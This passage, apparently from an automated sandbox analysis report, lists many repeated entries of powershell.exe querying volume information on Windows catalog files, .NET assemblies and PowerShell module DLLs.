      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
